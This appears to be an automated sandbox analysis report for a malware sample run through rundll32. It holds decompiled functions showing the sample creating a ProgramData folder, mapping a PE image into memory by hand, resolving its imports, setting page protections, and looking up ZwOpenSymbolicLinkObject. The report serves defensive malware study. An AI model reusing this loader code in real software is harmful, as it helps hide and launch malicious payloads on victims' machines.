    control_flow_graph 525 4851040-4851092 CreateDirectoryA 526 4851094-4851096 525->526 527 4851098 525->527 528 485109a-48510a7 call 4851a04 526->528 527->528
    C-Code - Quality: 100%
    			E04851040() {
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _t12;
				char _t13;
				int _t15;
				void* _t16;
				char _t17;
				intOrPtr _t18;
				char _t21;
				char _t22;
				signed int _t23;

				_v8 =  *0x4853004 ^ _t23;
				_t12 = "C:\\ProgramData\\huqvg"; // 0x505c3a43
				_v32 = _t12;
				_t17 = "rogramData\\huqvg"; // 0x72676f72
				_v28 = _t17;
				_t21 = "amData\\huqvg"; // 0x61446d61
				_v24 = _t21;
				_t13 = "ta\\huqvg"; // 0x685c6174
				_v20 = _t13;
				_t18 =  *0x4852110; // 0x67767175
				_v16 = _t18;
				_t22 =  *0x4852114; // 0x0
				_v12 = _t22;
				_t15 = CreateDirectoryA( &_v32, 0); // executed
				if(_t15 == 0) {
					_t16 = 0;
				} else {
					_t16 = 1;
				}
				E04851A04();
				return _t16;
			}



















    0x0485104d
    0x04851050
    0x04851055
    0x04851058
    0x0485105e
    0x04851061
    0x04851067
    0x0485106a
    0x0485106f
    0x04851072
    0x04851078
    0x0485107b
    0x04851081
    0x0485108a
    0x04851092
    0x04851098
    0x04851094
    0x04851094
    0x04851094
    0x0485109f
    0x048510a7

    APIs
    • CreateDirectoryA.KERNELBASE(?,00000000,?,?,?,?,?,?,048512A3), ref: 0485108A
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.665004317.0000000004851000.00000020.00000001.sdmp, Offset: 04850000, based on PE: true
    • Associated: 00000003.00000002.664819390.0000000004850000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.666866498.0000000004852000.00000002.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_4850000_rundll32.jbxd
    Similarity
    • API ID: CreateDirectory
    • String ID: C:\ProgramData\huqvg
    • API String ID: 4241100979-3793086718
    • Opcode ID: 65b275c4da335384316a47013434867cc923b1f702c6a625e2a96d6f272ab1d9
    • Instruction ID: 6803149813c8c04248061d1367b01acbc1052264027a175a7ea4f2ad14ca74ee
    • Opcode Fuzzy Hash: 65b275c4da335384316a47013434867cc923b1f702c6a625e2a96d6f272ab1d9
    • Instruction Fuzzy Hash: CF011974E443489FCB04EFA8E5816AEBBF8FB19200B404999D905D3340DA386E04CF51
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B1460, Relevance: 3.1, APIs: 2, Instructions: 104COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 531 11b1460-11b1470 532 11b147c-11b1488 531->532 533 11b1472-11b1477 531->533 535 11b148a-11b1495 532->535 536 11b14e4-11b14f0 532->536 534 11b15aa-11b15ad 533->534 537 11b14da-11b14df 535->537 538 11b1497-11b149e 535->538 539 11b14fb 536->539 540 11b14f2-11b14f9 536->540 537->534 541 11b14c2-11b14d4 VirtualFree 538->541 542 11b14a0-11b14ae 538->542 543 11b1502-11b1514 539->543 540->543 541->537 542->541 544 11b14b0-11b14c0 542->544 545 11b151f 543->545 546 11b1516-11b151d 543->546 544->537 544->541 547 11b1526-11b1538 545->547 546->547 548 11b153a-11b1541 547->548 549 11b1543 547->549 550 11b154a-11b1574 548->550 549->550 551 11b1582-11b159f VirtualProtect 550->551 552 11b1576-11b157f 550->552 553 11b15a1-11b15a3 551->553 554 11b15a5 551->554 552->551 553->534 554->534
    C-Code - Quality: 100%
    			E011B1460(intOrPtr __ecx, intOrPtr* _a4, void** _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				long _v40;
				int _t74;

				_v36 = __ecx;
				if(_a8[2] != 0) {
					if((_a8[3] & 0x02000000) == 0) {
						if((_a8[3] & 0x20000000) == 0) {
							_v12 = 0;
						} else {
							_v12 = 1;
						}
						_v24 = _v12;
						if((_a8[3] & 0x40000000) == 0) {
							_v16 = 0;
						} else {
							_v16 = 1;
						}
						_v28 = _v16;
						if((_a8[3] & 0x80000000) == 0) {
							_v20 = 0;
						} else {
							_v20 = 1;
						}
						_v32 = _v20;
						_t48 = _v28 * 8; // 0x2367118
						_v8 =  *((intOrPtr*)((_v24 << 4) + _t48 + 0x11b5a00 + _v32 * 4));
						if((_a8[3] & 0x04000000) != 0) {
							_v8 = _v8 | 0x00000200;
						}
						_t74 = VirtualProtect( *_a8, _a8[2], _v8,  &_v40); // executed
						if(_t74 != 0) {
							return 1;
						} else {
							return 0;
						}
					}
					if( *_a8 != _a8[1]) {
						L8:
						return 1;
					}
					if(_a8[4] != 0) {
						L7:
						VirtualFree( *_a8, _a8[2], 0x4000); // executed
						goto L8;
					}
					_t14 = _a4 + 0x30; // 0x0
					if( *((intOrPtr*)( *_a4 + 0x38)) ==  *_t14 || _a8[2] %  *(_a4 + 0x30) == 0) {
						goto L7;
					} else {
						goto L8;
					}
				}
				return 1;
			}













    0x011b1466
    0x011b1470
    0x011b1488
    0x011b14f0
    0x011b14fb
    0x011b14f2
    0x011b14f2
    0x011b14f2
    0x011b1505
    0x011b1514
    0x011b151f
    0x011b1516
    0x011b1516
    0x011b1516
    0x011b1529
    0x011b1538
    0x011b1543
    0x011b153a
    0x011b153a
    0x011b153a
    0x011b154d
    0x011b1559
    0x011b1566
    0x011b1574
    0x011b157f
    0x011b157f
    0x011b1597
    0x011b159f
    0x00000000
    0x011b15a1
    0x00000000
    0x011b15a1
    0x011b159f
    0x011b1495
    0x011b14da
    0x00000000
    0x011b14da
    0x011b149e
    0x011b14c2
    0x011b14d4
    0x00000000
    0x011b14d4
    0x011b14ab
    0x011b14ae
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x011b14ae
    0x00000000

    APIs
    • VirtualFree.KERNELBASE(?,00000000,00004000,?,?,?,?,011B1718,011B4000,?,011B4000,00000000), ref: 011B14D4
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 29690a2f6783a37834d35bfa42268a8fb08ac511f6875dc0146937865ac7924b
    • Instruction ID: 9b641ea556f4da83bbef9cf42aad9d75ae7401fc32d1075d0ea037e45d856bb6
    • Opcode Fuzzy Hash: 29690a2f6783a37834d35bfa42268a8fb08ac511f6875dc0146937865ac7924b
    • Instruction Fuzzy Hash: A141C675A10209AFDB18CF48D4E4BEAB7B2FB88314F15C159E81A5B355C775EA81CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B12A0, Relevance: 2.6, APIs: 2, Instructions: 115memoryCOMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 555 11b12a0-11b12ce 556 11b12e2-11b12ee 555->556 557 11b13e6 556->557 558 11b12f4-11b12fb 556->558 561 11b13eb-11b13ee 557->561 559 11b12fd-11b130a 558->559 560 11b1363-11b137e call 11b1270 558->560 562 11b135e 559->562 563 11b130c-11b132e VirtualAlloc 559->563 570 11b1380-11b1382 560->570 571 11b1384-11b13a9 VirtualAlloc 560->571 562->556 565 11b1330-11b1332 563->565 566 11b1337-11b135b call 11b1080 563->566 565->561 566->562 570->561 572 11b13ab-11b13ad 571->572 573 11b13af-11b13de call 11b10d0 571->573 572->561 573->557
    C-Code - Quality: 100%
    			E011B12A0(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				void* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				void* _t76;
				void* _t127;

				_v28 = __ecx;
				_t3 = _a16 + 4; // 0xf5e9
				_v16 =  *_t3;
				_t7 =  *_a16 + 0x14; // 0x508bf84d
				_t9 = ( *_t7 & 0x0000ffff) + 0x18; // 0x11b1e76
				_v8 =  *_a16 + _t9;
				_v20 = 0;
				while(1) {
					_t17 =  *_a16 + 6; // 0xe9000000
					if(_v20 >= ( *_t17 & 0x0000ffff)) {
						break;
					}
					if( *(_v8 + 0x10) != 0) {
						if(E011B1270(_v28, _a8,  *((intOrPtr*)(_v8 + 0x14)) +  *(_v8 + 0x10)) != 0) {
							_t76 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)),  *(_v8 + 0x10), 0x1000, 4); // executed
							_v12 = _t76;
							if(_v12 != 0) {
								_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
								E011B10D0(_v12, _a4 +  *((intOrPtr*)(_v8 + 0x14)),  *(_v8 + 0x10));
								_t127 = _t127 + 0xc;
								 *((intOrPtr*)(_v8 + 8)) = _v12;
								L1:
								_v20 = _v20 + 1;
								_v8 = _v8 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v24 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v24 <= 0) {
						L8:
						goto L1;
					}
					_v12 = VirtualAlloc(_v16 +  *((intOrPtr*)(_v8 + 0xc)), _v24, 0x1000, 4);
					if(_v12 != 0) {
						_v12 = _v16 +  *((intOrPtr*)(_v8 + 0xc));
						 *((intOrPtr*)(_v8 + 8)) = _v12;
						E011B1080(_v12, 0, _v24);
						_t127 = _t127 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}











    0x011b12a6
    0x011b12ac
    0x011b12af
    0x011b12bc
    0x011b12c0
    0x011b12c4
    0x011b12c7
    0x011b12e2
    0x011b12e7
    0x011b12ee
    0x00000000
    0x00000000
    0x011b12fb
    0x011b137e
    0x011b139c
    0x011b13a2
    0x011b13a9
    0x011b13b8
    0x011b13d0
    0x011b13d5
    0x011b13de
    0x011b12d0
    0x011b12d6
    0x011b12df
    0x00000000
    0x011b12df
    0x00000000
    0x011b13ab
    0x00000000
    0x011b1380
    0x011b1303
    0x011b130a
    0x011b135e
    0x00000000
    0x011b135e
    0x011b1327
    0x011b132e
    0x011b1340
    0x011b1349
    0x011b1356
    0x011b135b
    0x00000000
    0x011b135b
    0x00000000
    0x011b1330
    0x00000000

    APIs
    • VirtualAlloc.KERNEL32(?,00000000,00001000,00000004), ref: 011B1321
    • VirtualAlloc.KERNELBASE(?,?,00001000,00000004,00000000,?,?,011B1E5E), ref: 011B139C
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 28c10e09472410354f1c5860107c1bb7ad875c6b55124b1133804efb258c604e
    • Instruction ID: b104c0b7af9c6dd123f0819220d01eb4938e9eee746e3257a2a097b75d44b8bd
    • Opcode Fuzzy Hash: 28c10e09472410354f1c5860107c1bb7ad875c6b55124b1133804efb258c604e
    • Instruction Fuzzy Hash: 6951C575A04209EFCB08CF98D5D0AAEB7B1FF48314F218598E905AB355D370EE91CB95
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B190D, Relevance: 2.5, APIs: 2, Instructions: 34COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 577 11b190d-11b1924 IsBadReadPtr 579 11b192a-11b1931 577->579 580 11b1ae3-11b1ae9 577->580 579->580 581 11b1937-11b194e call 11b1af0 579->581 583 11b1950-11b195a 581->583 584 11b195c-11b196b SetLastError 583->584 585 11b1970-11b1985 call 11b1170 583->585 584->580 587 11b198a-11b1994 585->587 588 11b19c0-11b19f0 587->588 589 11b1996-11b19bb SetLastError 587->589 590 11b1a0b-11b1a20 588->590 591 11b19f2-11b1a09 588->591 589->580 593 11b1a23 590->593 591->593 594 11b1a37-11b1a3d 593->594 595 11b1ab8-11b1abc 594->595 596 11b1a3f-11b1a4a 594->596 597 11b1ade 595->597 598 11b1abe-11b1adc SetLastError 595->598 599 11b1a4c-11b1a73 596->599 600 11b1a75-11b1aa0 596->600 597->580 598->580 604 11b1aa2-11b1aa8 599->604 600->604 605 11b1aaa-11b1ab1 604->605 606 11b1ab3 604->606 605->595 606->594
    C-Code - Quality: 37%
    			E011B190D() {
				intOrPtr _t95;
				intOrPtr _t99;
				intOrPtr _t102;
				intOrPtr _t118;
				intOrPtr _t123;
				void* _t179;
				void* _t181;
				void* _t183;
				void* _t184;

				L0:
				while(1) {
					L0:
					 *(_t179 - 4) =  *(_t179 - 4) + 0x14;
					if(IsBadReadPtr( *(_t179 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t179 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
					_t12 =  *((intOrPtr*)(_t179 + 8)) + 0x1c; // 0x0, executed
					_t99 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0xc)),  *_t7); // executed
					_t183 = _t181 + 8;
					 *((intOrPtr*)(_t179 - 0x14)) = _t99;
					if( *((intOrPtr*)(_t179 - 0x14)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
						_t21 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
						_t102 = E011B1170( *_t21, 4 +  *_t17 * 4); // executed
						_t184 = _t183 + 8;
						 *((intOrPtr*)(_t179 - 0x20)) = _t102;
						if( *((intOrPtr*)(_t179 - 0x20)) != 0) {
							L7:
							 *((intOrPtr*)( *((intOrPtr*)(_t179 + 8)) + 8)) =  *((intOrPtr*)(_t179 - 0x20));
							_t34 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
							_t36 =  *((intOrPtr*)(_t179 + 8)) + 8; // 0x4
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t179 - 0x14));
							_t41 =  *((intOrPtr*)(_t179 + 8)) + 0xc; // 0xffff
							 *( *((intOrPtr*)(_t179 + 8)) + 0xc) =  *_t41 + 1;
							if( *( *(_t179 - 4)) == 0) {
								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
							} else {
								 *(_t179 - 8) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 4));
								 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0xc)) +  *((intOrPtr*)( *(_t179 - 4) + 0x10));
							}
							L12:
							while( *( *(_t179 - 8)) != 0) {
								if(( *( *(_t179 - 8)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t179 - 0x24)) =  *((intOrPtr*)(_t179 - 0xc)) +  *( *(_t179 - 8));
									_t77 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
									_t81 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
									_t118 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t179 - 0x14)),  *((intOrPtr*)(_t179 - 0x24)) + 2,  *_t77);
									_t184 = _t184 + 0xc;
									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t118;
								} else {
									_t67 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
									_t71 =  *((intOrPtr*)(_t179 + 8)) + 0x20; // 0x0
									_t123 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t179 - 0x14)),  *( *(_t179 - 8)) & 0x0000ffff,  *_t67);
									_t184 = _t184 + 0xc;
									 *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) = _t123;
								}
								L16:
								if( *((intOrPtr*)( *((intOrPtr*)(_t179 - 0x10)))) != 0) {
									L18:
									L11:
									 *(_t179 - 8) =  &(( *(_t179 - 8))[1]);
									 *((intOrPtr*)(_t179 - 0x10)) =  *((intOrPtr*)(_t179 - 0x10)) + 4;
									continue;
								} else {
									L17:
									 *((intOrPtr*)(_t179 - 0x18)) = 0;
								}
								break;
							}
							L19:
							if( *((intOrPtr*)(_t179 - 0x18)) != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
								_t90 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t179 - 0x14)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t179 + 8)) + 0x28; // 0x0
							_t28 =  *((intOrPtr*)(_t179 + 8)) + 0x24; // 0x0
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t179 - 0x14)),  *_t25);
							SetLastError(0xe);
							 *((intOrPtr*)(_t179 - 0x18)) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *((intOrPtr*)(_t179 - 0x18)) = 0;
					}
					break;
				}
				L22:
				_t95 =  *((intOrPtr*)(_t179 - 0x18));
				return _t95;
			}












    0x011b190d
    0x011b190d
    0x011b190d
    0x011b1913
    0x011b1924
    0x00000000
    0x00000000
    0x011b1937
    0x011b193a
    0x011b194b
    0x011b194e
    0x011b1950
    0x011b1953
    0x011b195a
    0x011b1970
    0x011b1973
    0x011b1981
    0x011b1985
    0x011b198a
    0x011b198d
    0x011b1994
    0x011b19c0
    0x011b19c6
    0x011b19cc
    0x011b19d2
    0x011b19d8
    0x011b19de
    0x011b19e7
    0x011b19f0
    0x011b1a14
    0x011b1a20
    0x011b19f2
    0x011b19fa
    0x011b1a06
    0x011b1a06
    0x00000000
    0x011b1a37
    0x011b1a4a
    0x011b1a7d
    0x011b1a83
    0x011b1a95
    0x011b1a98
    0x011b1a9a
    0x011b1aa0
    0x011b1a4c
    0x011b1a4f
    0x011b1a66
    0x011b1a69
    0x011b1a6b
    0x011b1a71
    0x011b1a71
    0x011b1aa2
    0x011b1aa8
    0x011b1ab3
    0x011b1a25
    0x011b1a2b
    0x011b1a34
    0x00000000
    0x011b1aaa
    0x011b1aaa
    0x011b1aaa
    0x011b1aaa
    0x00000000
    0x011b1aa8
    0x011b1ab8
    0x011b1abc
    0x011b1ade
    0x00000000
    0x011b1abe
    0x011b1abe
    0x011b1ac1
    0x011b1acc
    0x011b1acf
    0x011b1ad6
    0x011b1ad6
    0x011b1996
    0x011b1996
    0x011b1999
    0x011b19a4
    0x011b19a7
    0x011b19ae
    0x011b19b4
    0x011b19b4
    0x011b195c
    0x011b195c
    0x011b195e
    0x011b1964
    0x011b1964
    0x00000000
    0x011b195a
    0x011b1ae3
    0x011b1ae3
    0x011b1ae9

    APIs
    • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 011B191C
    • SetLastError.KERNEL32(0000007E), ref: 011B195E
    • SetLastError.KERNEL32(0000000E), ref: 011B19AE
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: ErrorLast$Read
    • String ID:
    • API String ID: 1935436914-0
    • Opcode ID: da4165bacb9bd278e740ca1032047d8c07ed4ff9b8cd0d33d95c14ae5002f22c
    • Instruction ID: 54cfb6acd1bf6337dfeb2db97a149875da28369c9a667a441de06af87c2c3e68
    • Opcode Fuzzy Hash: da4165bacb9bd278e740ca1032047d8c07ed4ff9b8cd0d33d95c14ae5002f22c
    • Instruction Fuzzy Hash: 98011D71A00108EFDB18DFA4D585BAEB7B1FF48314F218158E905AB241C774EF90DB91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1D10, Relevance: 1.6, APIs: 1, Instructions: 112COMMON
    Download Yara Rule

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 609 11a1d10-11a1d1d 610 11a1d29-11a1d35 609->610 611 11a1d1f-11a1d24 609->611 613 11a1d9d-11a1da9 610->613 614 11a1d37-11a1d42 610->614 612 11a1e71-11a1e74 611->612 615 11a1dab-11a1db2 613->615 616 11a1db4 613->616 617 11a1d93-11a1d98 614->617 618 11a1d44-11a1d4b 614->618 619 11a1dbb-11a1dcd 615->619 616->619 617->612 620 11a1d6f-11a1d8e call 11a1820 618->620 621 11a1d4d-11a1d5b 618->621 622 11a1dd8 619->622 623 11a1dcf-11a1dd6 619->623 625 11a1d90 620->625 621->620 624 11a1d5d-11a1d6d 621->624 626 11a1ddf-11a1df1 622->626 623->626 624->617 624->620 625->617 627 11a1dfc 626->627 628 11a1df3-11a1dfa 626->628 629 11a1e03-11a1e2e 627->629 628->629 630 11a1e3c-11a1e59 VirtualProtect 629->630 631 11a1e30-11a1e39 629->631 632 11a1e5b-11a1e6a call 11a1b20 630->632 633 11a1e6c 630->633 631->630 632->612 633->612
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: 5eaec03bfe33be913e40b4d6c8c93c7847f10b67c1659da54f6249096d699e24
    • Instruction ID: 0c3518607d6ae71a9287cf0a7487b8fe6681663824503604fb436f1963bd5423
    • Opcode Fuzzy Hash: 5eaec03bfe33be913e40b4d6c8c93c7847f10b67c1659da54f6249096d699e24
    • Instruction Fuzzy Hash: 4541FC78A00109EFEB09DF48C494BAEBBB2FB88314F54C559E9195F355D771EA82CB80
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B1AF0, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E011B1AF0(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}





    0x011b1af8
    0x011b1afe
    0x011b1b05
    0x00000000
    0x011b1b0b
    0x00000000

    APIs
    • LoadLibraryA.KERNELBASE(?), ref: 011B1AF8
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: LibraryLoad
    • String ID:
    • API String ID: 1029625771-0
    • Opcode ID: 1bb7ffc7889322aa7283c83199a8009e4f25475c4482445f13e6aeaf3c97e6f8
    • Instruction ID: b57cd42f40597a63bc606970604dbfbd5123ebc641ed814a5a5fa91b2367d1be
    • Opcode Fuzzy Hash: 1bb7ffc7889322aa7283c83199a8009e4f25475c4482445f13e6aeaf3c97e6f8
    • Instruction Fuzzy Hash: 03D09E7491920CFBCB14DEA5E68859977B8EB08251F1145A4F80993200E6319A909A91
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011B1140, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 100%
    			E011B1140(void* __ecx, long _a4) {
				void* _v8;
				void* _t5;

				_t5 = VirtualAlloc(0, _a4, 0x3000, 4); // executed
				_v8 = _t5;
				return _v8;
			}





    0x011b1151
    0x011b1157
    0x011b1160

    APIs
    • VirtualAlloc.KERNELBASE(00000000,011B11A1,00003000,00000004,00000004,?,011B11A1,?), ref: 011B1151
    Memory Dump Source
    • Source File: 00000003.00000002.662633575.00000000011B1000.00000020.00000001.sdmp, Offset: 011B0000, based on PE: true
    • Associated: 00000003.00000002.662614711.00000000011B0000.00000004.00000001.sdmp Download File
    • Associated: 00000003.00000002.662646662.00000000011B3000.00000002.00000001.sdmp Download File
    • Associated: 00000003.00000002.662686050.00000000011B4000.00000004.00000001.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11b0000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 13125dde12cde95e26db7df42fdca15dc8a8d56d36e7f1c8b324e6d67da0d987
    • Instruction ID: 425663991492c76840f69d1672238fb68a6ee2cfce811e9e83892b0b8100a080
    • Opcode Fuzzy Hash: 13125dde12cde95e26db7df42fdca15dc8a8d56d36e7f1c8b324e6d67da0d987
    • Instruction Fuzzy Hash: 10D0C97464520CBBE714CA84D846F69BBACEB08611F000194FE089B280D5B16E504791
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A19F0, Relevance: 1.3, APIs: 1, Instructions: 14memoryCOMMON
    Download Yara Rule
    APIs
    • VirtualAlloc.KERNELBASE(00000000,011A1A51,00003000,00000004,000000BE,?,011A1A51,?), ref: 011A1A01
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: AllocVirtual
    • String ID:
    • API String ID: 4275171209-0
    • Opcode ID: 8af300f66a45cc092db8a04f4baf019053ae5a84ee445cd1114e4bb4d5df2117
    • Instruction ID: 31ecfcd4b12ff572d31c6bd0c8a716626774005b8e674bf7e369de8b9929488a
    • Opcode Fuzzy Hash: 8af300f66a45cc092db8a04f4baf019053ae5a84ee445cd1114e4bb4d5df2117
    • Instruction Fuzzy Hash: 92D0C9B4685208BBE714CA84D906F69BBACE704611F004195FE089B280D5B1AE4057A1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 011A1820, Relevance: 1.3, APIs: 1, Instructions: 11COMMON
    Download Yara Rule
    APIs
    • VirtualFree.KERNELBASE(?,?,?), ref: 011A182F
    Memory Dump Source
    • Source File: 00000003.00000002.662490371.00000000011A1000.00000020.00000001.sdmp, Offset: 011A1000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_11a1000_rundll32.jbxd
    Similarity
    • API ID: FreeVirtual
    • String ID:
    • API String ID: 1263568516-0
    • Opcode ID: 344d0fefa3c7fec75bcd668203267a1e8cab9ae10a215e37755925135b7d2955
    • Instruction ID: 0736e211c1fc02c10101884e39eb60a24bef8ddd5788d0fc399ac8bfb5e81b09
    • Opcode Fuzzy Hash: 344d0fefa3c7fec75bcd668203267a1e8cab9ae10a215e37755925135b7d2955
    • Instruction Fuzzy Hash: 21C04C7615430CAB8B04DFD8E884DAB77ADBB8C610B448518BA2D87204D630F9508BA4
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 10001100, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON
    Download Yara Rule
    APIs
    • LoadLibraryW.KERNEL32(ntdll.dll,ZwOpenSymbolicLinkObject,?,10001538), ref: 1000110B
    • GetProcAddress.KERNEL32(00000000), ref: 10001112
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.668407668.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
    • Associated: 00000003.00000002.668390582.0000000010000000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668432316.0000000010002000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.668446107.0000000010003000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.668456462.0000000010004000.00000002.00020000.sdmp Download File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: ZwOpenSymbolicLinkObject$ntdll.dll
    • API String ID: 2574300362-2262421573
    • Opcode ID: b2162f11516302f4d5eca71e37eee3ebe81cc0872da632586161b8f1b77e2212
    • Instruction ID: bd841c76cede78a1409b9bf46fadacf407521c95edff58667da74993b579616d
    • Opcode Fuzzy Hash: b2162f11516302f4d5eca71e37eee3ebe81cc0872da632586161b8f1b77e2212
    • Instruction Fuzzy Hash: BCE05E317D433176F62063B46C8AFD62A48CB04BD2F004051F705DD0CCDA90584146A4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 0116095E, Relevance: .4, Instructions: 362COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.662420469.0000000001160000.00000040.00000001.sdmp, Offset: 01160000, based on PE: false
    Joe Sandbox IDA Plugin
